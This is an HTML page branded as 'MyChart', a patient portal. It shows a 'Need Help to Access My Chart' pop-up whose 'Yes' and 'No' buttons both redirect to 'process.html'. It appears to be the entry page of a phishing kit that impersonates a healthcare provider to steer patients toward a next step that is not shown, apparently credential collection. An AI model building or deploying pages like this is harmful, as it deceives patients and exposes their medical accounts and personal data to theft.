<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>MyChart</title>
	<link rel="icon" type="image/png" href="mychart/icon.png">
    <style>
       .modal-content {
            background-color: white;
            margin: 15% auto; /* Center the modal */
            padding: 60px;
            border-radius: 10px;
			height: 90%;
            width: 30%;
            text-align: center;
            box-shadow: 0px 4px 8px rgba(0, 0, 0, 0.2);
        }
.close-btn {
            color: white;
            background-color: #0818A8;
            padding: 10px 20px;
            border: 30px;
            border-radius: 10px;
            cursor: pointer;
            margin-top: 20px;
			font-size: 24px
        }
		.close-btn:hover {
            transform: scale(1.1); /* Increase size on hover */
        }
		
		.modal-logo {
            max-width: 100px;
			padding: -10px;	
            margin-bottom: 20px;
        }

        </style>
		
    </style>
	<style>
        body {
            background-image: url('mychart/mychart2.png'); /* Set an image as the background */
            background-size: cover; /* Make the image cover the whole page */
            background-repeat: no-repeat; /* Prevent the image from repeating */
        }
    </style>
</head>
<body>

<div id="myModal" class="modal">
        <div class="modal-content">
		<img src="mychart/icon.png" alt="Logo" class="modal-logo">
            <h1>Need Help ?</h1>
            <h2>Need Help to Access My Chart</h2>
			<button class="close-btn" onclick="closeModalAndOpenUrl()">Yes</button>
			<button class="close-btn" onclick="closeModalAndOpenUrl()">No</button>
        </div>
		
		<script>
       

        // Function to close the modal
        function closeModalAndOpenUrl() {
            document.getElementById('myModal').style.display = 'none';
			window.location.href = 'process.html';
        }
    </script>

</body>
</html>
